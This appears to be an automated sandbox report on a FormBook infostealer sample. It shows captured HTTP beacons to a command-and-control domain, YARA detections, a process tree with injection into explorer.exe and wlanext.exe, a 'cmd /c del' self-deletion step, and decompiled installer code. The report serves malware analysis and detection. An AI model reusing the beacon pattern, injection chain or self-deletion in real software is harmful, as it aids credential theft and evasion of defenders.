                                                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
                                                                                  May 12, 2021 20:04:04.026191950 CEST6027INData Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65
                                                                                  Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
                                                                                  May 12, 2021 20:04:04.026207924 CEST6028INData Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65
                                                                                  Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                                  May 12, 2021 20:04:04.026223898 CEST6030INData Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95
                                                                                  Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
                                                                                  May 12, 2021 20:04:04.026237011 CEST6030INData Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c
                                                                                  Data Ascii: s = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //
                                                                                  May 12, 2021 20:04:04.026252985 CEST6030INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  9192.168.2.44977134.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:04:09.156018019 CEST6049OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1
                                                                                  Host: www.tecquestrian.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:04:09.293071032 CEST6050INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Wed, 12 May 2021 18:04:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60995c49-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6800 Parent PID: 5832

                                                                                  General

                                                                                  Start time:20:02:19
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6840 Parent PID: 6800

                                                                                  General

                                                                                  Start time:20:02:20
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x400000
                                                                                  File size:418969 bytes
                                                                                  MD5 hash:1CEC9342AC2C1F91201DF672382672F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6840

                                                                                  General

                                                                                  Start time:20:02:25
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\explorer.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:
                                                                                  Imagebase:0x7ff6fee60000
                                                                                  File size:3933184 bytes
                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: wlanext.exe PID: 5876 Parent PID: 3424

                                                                                  General

                                                                                  Start time:20:02:40
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                  Imagebase:0x11c0000
                                                                                  File size:78848 bytes
                                                                                  MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Reputation:moderate

                                                                                  Chronological Activities

                                                                                  Analysis Process: cmd.exe PID: 6164 Parent PID: 5876

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:/c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
                                                                                  Imagebase:0x11d0000
                                                                                  File size:232960 bytes
                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: conhost.exe PID: 3980 Parent PID: 6164

                                                                                  General

                                                                                  Start time:20:02:44
                                                                                  Start date:12/05/2021
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff724c50000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >

                                                                                    Analysis Process: 1cec9342_by_Libranalysis.exe PID: 6800 Parent PID: 5832 1cec9342_by_Libranalysis.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 00403348, Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366stringcomfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 86%
                                                                                    			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f42c = _t42;
				if(_t42 != 6) {
					_t119 = E00406500(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E00406492(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406500(0xb);
				 *0x42f424 = E00406500(9);
				_t47 = E00406500(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f42f =  *0x42f42f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4f8 = _t47;
				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
				E004060F7("arability Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe\" ";
				E004060F7(_t160, _t51);
				 *0x42f420 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403317(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E00403830();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4d4;
													if( *0x42f4d4 == 0) {
														L67:
														_t63 =  *0x42f4ec;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406500(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f440 == 0) {
												L42:
												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
												goto L43;
											}
											_t153 = E00405ABA(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E0040577E(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\jones\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\jones\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E00405761();
														} else {
															E004056E4();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t162);
														}
														E004060F7(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
															DeleteFileA(0x429450);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe", 0x429450, 1) != 0) {
																E00405ED6(_t137, 0x429450, 0);
																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
																_t94 = E00405796(0x429450);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405ED6(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405B7D(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403317(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403317(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4e0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                                    0x00403358
                                                                                    0x0040335c
                                                                                    0x00403364
                                                                                    0x00403368
                                                                                    0x0040336d
                                                                                    0x00403379
                                                                                    0x00403382
                                                                                    0x00403387
                                                                                    0x0040338a
                                                                                    0x00403391
                                                                                    0x00403398
                                                                                    0x00403398
                                                                                    0x00403391
                                                                                    0x0040339a
                                                                                    0x0040339f
                                                                                    0x004033a0
                                                                                    0x004033ac
                                                                                    0x004033b0
                                                                                    0x004033b6
                                                                                    0x004033c4
                                                                                    0x004033c9
                                                                                    0x004033d0
                                                                                    0x004033d4
                                                                                    0x004033d8
                                                                                    0x004033da
                                                                                    0x004033da
                                                                                    0x004033d8
                                                                                    0x004033e2
                                                                                    0x004033e9
                                                                                    0x004033ef
                                                                                    0x00403405
                                                                                    0x00403415
                                                                                    0x0040341a
                                                                                    0x00403420
                                                                                    0x00403427
                                                                                    0x00403433
                                                                                    0x0040343d
                                                                                    0x0040343f
                                                                                    0x00403441
                                                                                    0x00403446
                                                                                    0x00403446
                                                                                    0x00403456
                                                                                    0x0040345c
                                                                                    0x00403525
                                                                                    0x00403525
                                                                                    0x00403527
                                                                                    0x00403529
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403465
                                                                                    0x00403468
                                                                                    0x00403470
                                                                                    0x00403470
                                                                                    0x00403473
                                                                                    0x00403478
                                                                                    0x0040347a
                                                                                    0x0040347a
                                                                                    0x0040347b
                                                                                    0x0040347b
                                                                                    0x00403480
                                                                                    0x00403483
                                                                                    0x00403515
                                                                                    0x0040351a
                                                                                    0x0040351f
                                                                                    0x00403522
                                                                                    0x00403524
                                                                                    0x00403524
                                                                                    0x00403524
                                                                                    0x00000000
                                                                                    0x00403489
                                                                                    0x00403489
                                                                                    0x0040348a
                                                                                    0x0040348d
                                                                                    0x004034a5
                                                                                    0x004034d0
                                                                                    0x004034d2
                                                                                    0x004034e5
                                                                                    0x00403510
                                                                                    0x00403513
                                                                                    0x00403531
                                                                                    0x00403534
                                                                                    0x0040353d
                                                                                    0x00403542
                                                                                    0x00403548
                                                                                    0x00403553
                                                                                    0x00403555
                                                                                    0x0040355a
                                                                                    0x0040355c
                                                                                    0x004035b4
                                                                                    0x004035b9
                                                                                    0x004035c3
                                                                                    0x004035ca
                                                                                    0x004035ce
                                                                                    0x00403662
                                                                                    0x00403662
